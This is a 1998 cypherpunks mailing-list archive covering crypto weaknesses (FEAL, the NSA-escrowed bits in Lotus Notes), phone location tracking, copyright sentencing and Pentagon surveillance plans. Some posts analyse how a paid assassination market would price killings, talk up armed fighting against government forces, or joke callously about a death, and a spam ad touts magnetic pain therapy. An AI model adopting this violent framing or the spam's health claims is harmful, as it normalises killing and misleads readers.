>life very difficult for any luckless squad that happens your way. Multiply
>that by 100 million armed citizens and you see that armed civilian
>resistance *can* defeat an occupying army.
>

I'm not sure I am convinced by this argument.

The "enemy within" seems to be the main focus of the discussions in the CP
list. When the 'luckless squad that happens your way' is manned by your
countrymen at the command of their (and your) government, what then? Will
you still attempt to defeat the 'occupying army'?

As far as I can see, the result would be a *very* bloody civil war. The
outcome may indeed be less obvious than in a 'conventional' (i.e. unarmed
populace) civil war, but the cost much higher.

Bear in mind that this is from the standpoint of a 'sissy' European. I
admit I am poorly equipped to comment on the American Zeitgeist. However,
my experience of civil war victims (extensive contact with refugees from
the E-bloc) suggests to me that we should be concentrating on social
revolution before we tool up for a military one. There is more to be won,
with a potentially much lower cost.

By all means buy the hardware, that is after all your right. Just spare the
hero talk. *Everyone* thinks they'll be one of the survivors in a war, just
as 95% of the population believe they have an above average IQ.

My understanding of the word 'revolution' in this context means realigning
the opinions of the governments and peoples around the globe to allow
freedoms such as those supported by Cypherpunks to be freely available. An
example of this is to work against the misinformation spread by 'them'
which leads the average Joe (dumb or not) to think that 'Encrypted Data =
Child Porn/Drug Barons planning something big/More child porn'.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@sirius.infonex.com>
Date: Wed, 7 Jan 1998 09:51:40 +0800
To: cypherpunks@cyberpass.net
Subject: employment opportunity
Message-ID: <Pine.SOL.3.96.980106173605.19047L-100000@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain




A tech support position's opened at Infonex and the Anonymizer in the San
Diego, California area. The job requires demonstrable unix, typing and
English communication skills. C/C++, Perl, Java/Javascript, system
administration and networking experience are secondary qualifications.
Duties include routine technical support and occasional clerical tasks,
and could include opportunity for future advancement based on skills. Wage
based on skillset. Entry-level position. If interested, fax resume to
619-667-7966 or e-mail to job@infonex.com. 

Mark Hedges
Anonymizer, Inc.
Infonex Internet, Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Wed, 7 Jan 1998 10:20:02 +0800
To: daw@cs.berkeley.edu
Subject: Re: Is FEAL developed by NTT safe?
Message-ID: <19980107020417.23803.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>In article <19980105070034.3946.qmail@hotmail.com> you write:
>> Is FEAL developed by NTT safe? Where isn't safe if it is here because 
it 
>> isn't safe? 
>
>FEAL is dead; I wouldn't ever use it in any new product.
>Use triple-DES instead.
>
What kind of method was FEAL decoded in? 


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalonz@openworld.com
Date: Wed, 7 Jan 1998 07:21:12 +0800
To: cypherpunks@toad.com
Subject: The Digital Society Group
Message-ID: <85256584.007B1AC7.00@openworld.com>
MIME-Version: 1.0
Content-Type: text/plain




Hi all,

Openworld, Inc. is a company which sets up free enterprise zones around the
world. The "free zones" are akin to Hong Kong and Singapore and are
self-governing, independent entities as recognized by the parent country.

Free zones usually have the ability to issue citizenship, business licenses
and incorporation status to entities as well as have their own police force
and arbitration structure. A lot of them are not nearly big enough to need
that kind of independence, but there are a few.

Free zones rarely have bureacracy, taxes, etc. because the idea is to
create an environment for the rapid creation and deployment of new
businesses. Land is leased for 50-100 years with a parent entity buy-back
at the end of the term.

Can anyone say corporate state? Basically, free zones are corporations (or
groups of) leasing land from a country in order to make it valuable enough
to sell back at a large profit in 100 years. Notice that the emphasis is on
very long-term results. The free zone only makes money if the residents are
happy, educated and making money. Environmental issues are addressed
immediately. There is no bureacracy to hold things back.

I'll be the first to agree that a corporate state is very easy to abuse
(soon the world could end up being a Microsoft corporate state <joke>). But
you have to start somewhere.

Most of these zones are created in third world countries and poorly
developed areas.  Free zones are exempt from telecommunications monopolies
so the bandwidth and connection fees are at regular US wholesale market
rates. When you consider that the economy is moving to be information and
bandwidth dependent, and the main thing holding a new country back is the
cost of a satellite feed, a free zone has enormous impact on the growth of
an area.

It is a bit mind-boggling to realize what the marriage of a free economic
zone and the Internet can accomplish.

Openworld, Inc. is developing drop-in modules for health, education,
business and governance functions for free zones as well as Internet
connectivity and infrastructures.

A division of Openworld, Inc., The Digital Society Group, has been formed
to apply technology to the infrastructure of the free zones and essentially
mirror them in cyberspace <argh, the cyber word again>.

Without getting into too much detail, The Digital Society Group is
constructing a pure-technology infrastructure to provide for the operation,
governance and existence of a complete digital society within a free
enterprise zone.

My priorities are:

1. encryption for all

2. anonymity for all

3. digital currency for all

4. the ability for the creation of ad-hoc micro-communities by citizens
more or less on-the-fly

5. the ability for any entity - hardware, software, etc. to be a citizen
and be entitled to certain rights such as property ownership,
incorporation,etc. (the legislation is being written right now)

6. do it very, very cheaply and give it to the end-user (the world) for
free.

Check out:

http://www.openworld.com/digitalsociety

Sorry about the sparse web pages and the crappy graphics, but there is no
money for a graphics designer.

Locations are planned for Africa, Southeast Asia, Russia, etc.

We are already coding...

:)
Jalon

---------------------------------------------------------------
Jalon Q. Zimmerman, Director
The Digital Society Group
A division of Openworld, Inc.

http://www.openworld.com/digitalsociety
jalonz@openworld.com
---------------------------------------------------------------
The government is not your mommy.
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 7 Jan 1998 13:22:52 +0800
To: Alexandre Maret <rp@rpini.com>
Subject: Re: Location Escrow anyone ?
In-Reply-To: <c=AU%a=TELEMEMO_%p=TAFENSW%l=ISF10-980102034537Z-4222@ixf2m1.isd.tafensw.edu.au>
Message-ID: <3.0.5.32.19980106184201.00832180@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Tracking your position in real time is one thing - recording the tracks
is quite another.    The system does need to know, in real time,
the cell for each phone that's currently talking,
and needs to know quickly where any phone that's being called is
(could be implemented either by constantly tracking every phone,
or by sending out requests when the call is made,
probably starting with the usual suspect locations and then
branching out farther, or using some kind of roaming notification.)

But does it need to know where you've been?  It wouldn't be surprising
if the telco recorded location (at least cell site) at the beginning
of each call, to resolve billing disputes with customers,
and of course they record minutes of use and roaming information
for users who make calls outside their home territory.
They probably also record calls per cell site and handoff information,
but probably not by user.

For police purposes, if you want to find somebody right now,
and the cellphone system can only give you precise locations right now,
just call them - "Hey, Suspect!  We know where you are,
and it's costing you money for us to call you and tell you!
Have a nice day!" - and the system knows even if they don't answer.

At 02:42 PM 01/03/1998 +0100, Alexandre Maret wrote:
>If they store the location of your phone every 3 secs, for 6 month,
>this means 5'241'600 locations. Printed on 70 lines/page paper,
>this means 74'880 A4 pages. Do you think they'd be happy to print
>and send you 74'880 pages for 300SFrs ?

They could probably deliver it on industry-standard 9-track tape :-)
5 bytes is enough to locate you within 62m anywhere on Earth
- 16 bits gets you 1km of lat or long on a 40000km planet),
though 4 bytes is probably enough to identify a cell plus
some precision bits since the whole planet doesn't have cell sites.
So it's really only 20-25MB of data per user to track that much data,
and it compresses extremely well (e.g. 1 byte/sample is plenty for
phones that are moving, and run-length coding radically reduces the
location of the phones that aren't moving, which probably
covers 23 hours a day for most people.)  Call it 250KB/day, max?
I'd be surprised if they really kept that much, and the economics are bad,
but they could do it, and they'll be much happier to mail you a floppy
of compressed data for your 300 francs, or print it in very tiny print...

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 7 Jan 1998 03:27:33 +0800
To: declan@well.com
Subject: Re: Jim Bell article excerpt (Was: Letter on Jim Bell)
In-Reply-To: <v03007803b0d8265bac75@[168.161.105.216]>
Message-ID: <199801061908.TAA00400@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Declan McCullagh <declan@well.com> writes:

Declan reposting something he wrote last year:

> After I pointed this out to Bell on the phone [someone might
> assassinate annoying neighbors], he fired email back a few days
> later saying, "Assuming a functioning Assassination Politics system,
> nothing stops you from contributing to my death."  He suggested that
> maybe assassins would develop scruples: "You'd be able to purchase
> deaths of unworthy people, but it might be only at a dramatically
> higher price. Doable but not particularly economical."

You interpret Jim as implying "maybe assassins would develop
scruples"; 

this doesn't look like the meaning of what you quote Jim as saying:

 "You'd be able to purchase deaths of unworthy people, but it might be
  only at a dramatically higher price."

it looks more like Jim was suggesting that free market forces would
tend to prevent deaths of lesser known people.  Think about it -- it
would be dead easy to get a contract on Barney due to the number of
people who know and hate him -- but on an average neighbor, who is
completely obscure, you'd easily have to fund the entire bet yourself.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 7 Jan 1998 11:16:01 +0800
To: cypherpunks@www.video-collage.com
Subject: Police Report Stirs Up Militia Groups
Message-ID: <199801070309.VAA08399@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Police Report Stirs Up Militia Groups

          (MARTINSVILLE) -- A confidential state police report... which
          looked at the dangers of right-wing militia groups in
          Indiana... is causing a stir among elected officials and
          militia members in Morgan County. While the report discounts any
          immediate threat of terrorist attacks from Indiana militias, it
          does suggest that militia members are getting involved in local
          politics and may have too much influence in some areas. Morgan
          County commissioners think they're the ones referred to in
          the report... and they say they're offended at the implication
          they're controlled by any special interest group.

reuters





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Wed, 7 Jan 1998 16:50:54 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <199801061930.NAA09848@wire.insync.net>
Message-ID: <v0311070eb0d8be53e6a8@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:49 AM -0800 1/6/98, Eric Cordian wrote:
>I managed to find a document entitled "Security in Lotus Notes and the
>Internet" on the Web.
>
>It describes the weakening procedure as follows.
>
>  "No matter which version of Notes you are using, encryption uses the
>   full 64-bit key size. However, the International edition takes 24 bits
>   of the key and encrypts it using an RSA public key for which the US
>   National Security Agency holds the matching private key. This
>   encrypted portion of the key is then sent with each message as an
>   additional field, the workfactor reduction field. The net result of
>   this is that an illegitimate hacker has to tackle 64-bit encryption,
>   which is at or beyond the practical limit for current decryption
>   technology and hardware. The US government, on the other hand, only
>   has to break a 40-bit key space, which is much easier (2 to the power
>   of 24 times easier, to be precise)."

It seems to me that if you step on the correct part of the message, you zap
the encrypted 24 bits, and cut NSA out of the loop.  Of course the receiver
could notice and refuse to decrypt, which would require some software
hacking to defeat, but that is certainly doable.


-------------------------------------------------------------------------
Bill Frantz       | One party wants to control | Periwinkle -- Consulting
(408)356-8506     | what you do in the bedroom,| 16345 Englewood Ave.
frantz@netcom.com | the other in the boardroom.| Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 7 Jan 1998 05:37:07 +0800
To: jim@mentat.com
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <9801062004.AA18375@mentat.com>
Message-ID: <199801062128.VAA00264@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Jim Gillogly <jim@mentat.com> writes:
> Eric Cordian says:
> > Could someone poke through Lotus Notes with a debugger and see exactly how
> > this "giving 24 bits to the government" is implemented? 
> 
> Lotus produced a "backgrounder" called "Differential Workfactor Cryptography"
> when they first promulgated the 64/40 stuff.  It says (in part):
> 
> 	We do that by encrypting 24 of the 64 bits under a public RSA key
> 	provided by the U.S. government and binding the encrypted partial
> 	key to the encrypted data.
> 
> I haven't seen the USG RSA key -- if it's 512 bits, that would be a humorous
> next factoring target.

It would be humorous to even have the modulus and exponent -- if
someone can obtain them, I'll package it up as a working PGP key, and
give it user id of Spook GAK key <dirnsa@nsa.gov>, and submit to the
keyservers.  Then we have solved the key escrow implementation
problems for the US government -- anyone who wants to send them a
message can simply add DIRNSA to the list of recipeints.

I don't have a copy of Notes, otherwise I thought this a most fun
exploit to attempt.

The above "solution" to key escrow infra-structure calls from Freeh
etc., should be credited to Carl Ellison; probably others have
proposed it also.  Carl offered to sign some cheif spooks key, if he
would generate one for the purpose, cheif spook declined the offer.

I observed a few times before that now that Lotus have organised with
the NSA to produce such a key, we can do the job of implementing the
voluntary key escrow infrastructure for them.  (It is voluntary
right?)

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Wed, 7 Jan 1998 14:07:19 +0800
To: "Nobuki Nakatuji" <bd1011@hotmail.com>
Subject: Re: Is FEAL developed by NTT safe?
In-Reply-To: <19980107020417.23803.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980106215602.0098b670@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 06:04 PM 1/6/98 PST, Nobuki Nakatuji wrote:
>
>>
>>In article <19980105070034.3946.qmail@hotmail.com> you write:
>>> Is FEAL developed by NTT safe? Where isn't safe if it is here because 
>it 
>>> isn't safe? 
>>
>>FEAL is dead; I wouldn't ever use it in any new product.
>>Use triple-DES instead.
>>
>What kind of method was FEAL decoded in? 

All of them.

If you take a look at _Applied Cryptography (2nd Edition)_, you will find a
number of different methods that have been used against FEAL.

It seems that whenever someone comes up with a new method of cryptanalysis,
they use it on FEAL first.  (Or at least it seems that way...)

There are much better solutions.  Unpatented ones as well...

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abc.307@iname.com
Date: Wed, 7 Jan 1998 12:51:53 +0800
To: cypherpunks@toad.com
Subject: 70% Profit your 1st Day.
Message-ID: <199801062135.e-mail@_tommy.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello,

YOU KEEP THE HIGHEST RETAIL PROFITS EVER!!
*****************************************************

Consumer Direct Inc. has increased YOUR RETAIL PROFITS to 70%

*	Very LOW investment
*	Start earning the 70% profits your 1st day
*	YOU KEEP ALL THE PROFITS

*	High Impact Nutritionals by Durk Pearson & Sandy Shaw
*	Euro-Wash Laundry Ball eliminates Toxic Detergents
*	Magnetic Therapy Technology for immediate Pain Relief

Just 2 Easy Steps:

USA/CANADA		1-888-877-7092 (Special Holiday Call)
INTERNATIONAL	1-512-703-8033

CALL US			1-800-600-0343  x1422

Best Regards,

Rhonda & Pete

---------------------------------------------------------------------
To Be Removed mailto:RemoveMe@leipro23.com?subject=REMOVE







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 7 Jan 1998 12:21:49 +0800
To: cypherpunks@toad.com
Subject: Sentencing for Electronic Copyright Infringement
Message-ID: <1.5.4.32.19980107033511.00750ac4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



The United States Sentencing Commission published in the 
Federal Register today an RFC on changes in sentencing 
guidelines. Here's an excerpt on electronic copyright 
infringement:

. . .

Legislative Amendments

Electronic Copyright Infringement

9. Issue for Comment

    The No Electronic Theft Act, Public Law 105-147, was recently 
enacted to provide a statutory basis to prosecute and punish persons 
who, without authorization and without realizing financial gain or 
commercial advantage, electronically access copyrighted materials or 
encourage others to do so. The Act includes a directive to the 
Commission to (A) ensure that the applicable guideline range for a 
crime committed against intellectual property (including offenses set 
forth at section 506(a) of title 17, United States Code, and sections 
2319, 2319A, and 2320 of title 18, United States Code) is sufficiently 
stringent to deter such a crime; and (B) ensure that the guidelines 
provide for consideration of the retail value and quantity of the items 
with respect to which the crime against intellectual property was 
committed.

    Each of the statutes mentioned in the congressional directive 
currently are referenced to Sec. 2B5.3 (Criminal Infringement of 
Copyright or Trademark). That guideline provides for incrementally 
greater punishment when the retail value of the infringing items 
exceeded $2,000. However, when copyrighted materials are infringed upon 
by electronic means, there is no ``infringing item'', as would be the 
case with counterfeited goods. Therefore, the Commission must determine 
how to value the infringed upon items in order to implement the 
congressional directive to take into account the retail value and 
quantity of the items with respect to which the offense was
committed. The Commission invites comment on how Sec. 2B5.3 (Criminal 
Infringement of Copyright or Trademark) should be amended to best 
effectuate the congressional directives.

    An approach suggested by the Department of Justice is set forth 
below. The Commission invites comment on this and alternative 
proposals.

    Department of Justice Proposed Amendments to Sec. 2B5.3:

    The text of Sec. 2B5.3 is amended to read as follows: ``(a) Base 
offense level: [6]

    (b) Specific Offense Characteristic

    (1) If the loss to the copyright or trademark exceeded $2,000, 
increase by the corresponding number of levels from the table in 
Sec. 2F1.1 (Fraud and Deceit).''.

    The Commentary to Sec. 2B5.3 captioned ``Application Note'' is 
amended in Note 1 by striking:

    `` `Infringing items' means the items that violate the copyright or 
trademark laws (not the legitimate items that are infringed upon).'',

and inserting:

    ``A court may calculate the `loss to the copyright or trademark 
owner' in any reasonable manner. In determining `loss to the copyright 
or trademark owner,' the court may consider lost profits, the value of 
the infringed upon items, the value of the infringing items, the injury 
to the copyright or trademark owner's reputation, and other associated 
harms.''.

    The Commentary to Sec. 2B5.3 captioned ``Application Note'' is 
amended by striking ``Note'' and inserting ``Notes''; and by adding at 
the end the following new note:

    ``2. In some cases, the calculable loss to the victim understates 
the true harm caused by the offense. For example, a defendant may post 
copyrighted material to an electronic bulletin board or similar online 
facility, making it easy for others to illegally obtain and further 
distribute the material. In such an instance, it may not be possible to 
determine or even estimate how many copies were downloaded, or how much 
damage the defendant's conduct ultimately caused. In such cases, an 
upward departure may be warranted. See Chapter Five, Part K 
(Departures).''.

    The Commentary to Sec. 2B5.3 captioned ``Background'' is amended in 
the first paragraph by striking ``value of the infringing items'' and 
inserting ``loss to the copyright or trademark owner''; and by striking 
``loss or''.

[End excerpt]

For the full RFC:

   http://jya.com/ussc010698.txt  (254K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kurt Buff <kurtbuff@halcyon.com>
Date: Wed, 7 Jan 1998 16:27:40 +0800
To: "'Trei, Peter'" <cypherpunks@toad.com>
Subject: RE: best body armor for cypherpunks [serious]
Message-ID: <01BD1B01.0AF53040.kurtbuff@halcyon.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nice shot! :)

However, Second Chance is probably the leader of that particular 
pack.

- -----Original Message-----
From:	Trei, Peter [SMTP:ptrei@securitydynamics.com]
Sent:	Monday, January 05, 1998 8:32 AM
To:	'cypherpunks@toad.com'
Subject:	RE: best body armor for cypherpunks [serious]



> ----------
> From: 	Mix[SMTP:mixmaster@remail.obscura.com]
> Reply To: 	Mix
> Sent: 	Sunday, January 04, 1998 10:44 PM
> To: 	cypherpunks@toad.com
> Subject: 	best body armor for cypherpunks [serious]
> 
> What is, in your opinion, the best (price and performance-wise)
> body armor for cypherpunks?
> 
After a few years on this list, one develops such a thick skin that
extra protection is superfluos

Peter Trei
ptrei@securitydynamics.c
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNLMsmw3xegzLXcRmEQKJ4gCg9Fr8/XXJFUsB9UaPaZ4zymdc5GoAn3YS
u46oyeNLel8/+nYbBs7Xb49R
=EqQY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kurt Buff <kurtbuff@halcyon.com>
Date: Wed, 7 Jan 1998 16:23:39 +0800
To: "'Dr.Dimitri Vulis KOTM'" <cypherpunks@toad.com>
Subject: RE: [Humor] Kennedy's New Legislation
Message-ID: <01BD1B01.0CBA5FE0.kurtbuff@halcyon.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

It balances, or more accurately, they don't.

A second politician died today on the ski slope - Sonny Bono.

- -----Original Message-----
From:	Dr.Dimitri Vulis KOTM [SMTP:dlv@bwalk.dm.com]
Sent:	Monday, January 05, 1998 4:19 PM
To:	cypherpunks@toad.com
Subject:	Re: [Humor] Kennedy's New Legislation

Declan McCullagh <declan@well.com> writes:

> We have a good story in this week's Time that talks about how the 
ski
> resort had repeatedly asked the Kennedys to knock it off. Including 
the
> night before the accident. Even on the "fateful" afternoon, the ski 
patrol
> had told the Kennedys -- the last on the slopes -- it was time to 
quit.
> "Nevertheless, 36 members of the Kennedy party prepared to play."

"Evolution in action."

Thank you, Michael Kennedy, for improving humanity's gene pool.

- ---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNLMtJw3xegzLXcRmEQKeCwCgsElXKkUb2dzM+N0d2nn8I7fresoAn2yF
fsizimZ5xfume+xLbPvpQCWL
=ZhY3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 7 Jan 1998 13:18:24 +0800
To: users@ssz.com (SSZ User Mail List)
Subject: Hi-tech anti-terrorism... [CNN]
Message-ID: <199801070542.XAA29574@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                    GADGET WARFARE: HIGH-TECH ANTI-TERRORISM
>                                        
>      January 6, 1998
>      Web posted at: 9:34 p.m. EST (0234 GMT)
>      
>      From Netly News Writer Declan McCullagh
>      
>      For a country with no real military rivals, the U.S. still manages
>      to find an amazing number of enemies. Terrorists top the list of
>      anti-American villains, according to a Pentagon report released last
>      month.
>      
>      The 100-page document, called "Responses to Transnational Threats,"
>      describes how the military should respond to the threat of saboteurs
>      and bombers aiming for violence, not victory. The solution,
>      according to the Pentagon, is to develop a set of gadgets that would
>      make even James Bond jealous.
>      
>   Micro-robots
>   
>      A spy camera scuttling through the underbrush? Yes, disguised as "an
>      insect, a small pebble, or a stick." The report calls for the
>      development of "micro-robots" that walk or fly and can beam video,
>      audio and infrared signals back to their operators: "These sensors

[deleted text]

>   Sticky electronics
>   
>       Think SpiderMan's spidertracers, only smaller. "Sticky electronics"
>      adhere to a suspected terrorist's clothing, hair, luggage or vehicle
>      and report his location. These almost microscopic gizmos tune in to
>      satellite signals and transmit their exact latitude and longitude.

[deleted text]

>   Bio-sniffers
>   
>      Go lie down, Fido. Soon drug-sniffing dogs may be replaced by even
>      more sensitive, digital noses. If suspects have been handling nukes,
>      biological weapons or high explosives, the military hopes to be able
>      to sniff substance traces from items like passports. "As future

[text deleted]

>      technology is improved, antigens might then be detected at national
>      entry portals as trace contamination on emigration documents or
>      passports, by urine analysis or by other means." Look for companies
>      to use this as a more sensitive (if not more reliable) type of drug
>      testing.
>      
>   The Internet
>   
>       The Net shouldn't be viewed as "a vulnerability." That view "loses
>      sight of many potential benefits," the Pentagon explains. To the
>      spooks, the Net "is an underexploited information-acquisition
>      resource" that "allows for remote and anonymous participation in
>      online 'chat' forums that might provide insight into dissident group
>      activities." (Look out, alt.fan.militia!) The military also wants to
>      create a "secure, transnational threat information infrastructure"
>      -- at a cost of a mere $300 million.
>      
>   Data mining
>   
>      If you worried about the FBI's jones for access to your data, wait
>      'til you find out what the military hopes to do. The Pentagon wants
>      authority to sift through private-sector databases in hopes of
>      tracking down, say, the World Trade Center bombers before they
>      strike. The plan is to incorporate "real-time data on international
>      border crossings, real-time cargo manifests, global financial

[deleted text]

>   Smart software
>   
>      Once you've got the databases, how do you use 'em? The military says
>      the answer is "groupware" and "intelligent software agents" that
>      "can be focused to search for a confluence of events in multiple
>      databases or for goals over time." Consumer marketers will finally
>      be able to determine the commonalities between the Hajj, Promise
>      Keeper gatherings and Burning Man.
>      
>      So would military budgets. In a world where even the Pentagon admits
>      that the U.S. is the only remaining superpower, the defense
>      community argues that terrorism threats justify their budgets.
>      "Nothing will be more challenging to the protection of our citizens,
>      soldiers and our way of life than the threats of weapons of mass
>      destruction and terrorism," General John Shalikashvili, chairman of

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 7 Jan 1998 16:33:19 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: Sentencing for Electronic Copyright Infringement
In-Reply-To: <1.5.4.32.19980107033511.00750ac4@pop.pipeline.com>
Message-ID: <v03102800b0d8e84e5a9d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:35 PM -0800 1/6/98, John Young wrote:
>The United States Sentencing Commission published in the
>Federal Register today an RFC on changes in sentencing
>guidelines. Here's an excerpt on electronic copyright
>infringement:
....
>    (1) If the loss to the copyright or trademark exceeded $2,000,
>increase by the corresponding number of levels from the table in
>Sec. 2F1.1 (Fraud and Deceit).''.
....

The upshot of all this "spreadsheet sentencing" is that nearly all of us
have some number of infringing materials, illegal copies, or unauthorized
downloads on our systems.

Or we have more than the allowable number of backup copies of our important
programs. Or even of our unimportant programs.

When the ninja narc raiders cart our computers off for analysis, I'm sure
they can find enough violations to send us away for as many years as they
wish.

Even though I'm not a "warez" trader, or even a software pirate, and even
though I have perhaps foolishly bought many thousands of dollars worth of
now-discontinued and now-unused products ("shelfware"), I am quite sure the
Authorities could find dozens and dozens of violations of these new laws.

Welcome to Amerika.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Wed, 7 Jan 1998 16:20:04 +0800
To: cypherpunks@Algebra.COM
Subject: Re: cypherpunks and guns
In-Reply-To: <tw767nxj3q7.fsf@the-great-machine.mit.edu>
Message-ID: <19980107001651.29456@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Jan 07, 1998 at 01:25:45AM -0600, snow wrote:
> > I am fairly certain that as an irregular army soldier I could inflict
> > a substantial amount of damage upon an occupying military.  With maybe
> > $20k in equipment and several hundred hours of training, you could make
> 
> 	If you were smart, you could do it for a lot less. 

That presumes the enemy is dumb.  An amusing fantasy.

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 7 Jan 1998 08:06:18 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <199801062128.VAA00264@server.eternity.org>
Message-ID: <Pine.BSF.3.96.980107005815.1903D-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 6 Jan 1998, Adam Back wrote:
> It would be humorous to even have the modulus and exponent -- if
> someone can obtain them, I'll package it up as a working PGP key, and
> give it user id of Spook GAK key <dirnsa@nsa.gov>, and submit to the
> keyservers.  Then we have solved the key escrow implementation
> problems for the US government -- anyone who wants to send them a
> message can simply add DIRNSA to the list of recipeints.

This would be truly hilarious. Anybody out there with a copy of Notes and
a debugger? :-)

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Wed, 7 Jan 1998 14:22:39 +0800
To: weidai@eskimo.com (Wei Dai)
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <199801070718.BAA01750@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



> I don't understand why there is so much talk about guns here lately.
> Unless someone comes up with a weapon that has some very unusual economic
> properties, individuals cannot hope to compete with governments in the
> domain of deadly force. If we have to resort to physical violence, we've

	Tell that to Lincoln, Duke F., Kennedy, &etc. 

	No, we couldn't win thru the overwhelming use of force, but force 
properly applied could at some point prove useful.

> already lost!

	There are some of us who feel that if we "lose", it would be better 
to go down fighting than to live in the kind of world where we can't protect
our privacy with crypto. 
 
> Think about it: if we can defend ourselves with guns, why would we need
> crypto?

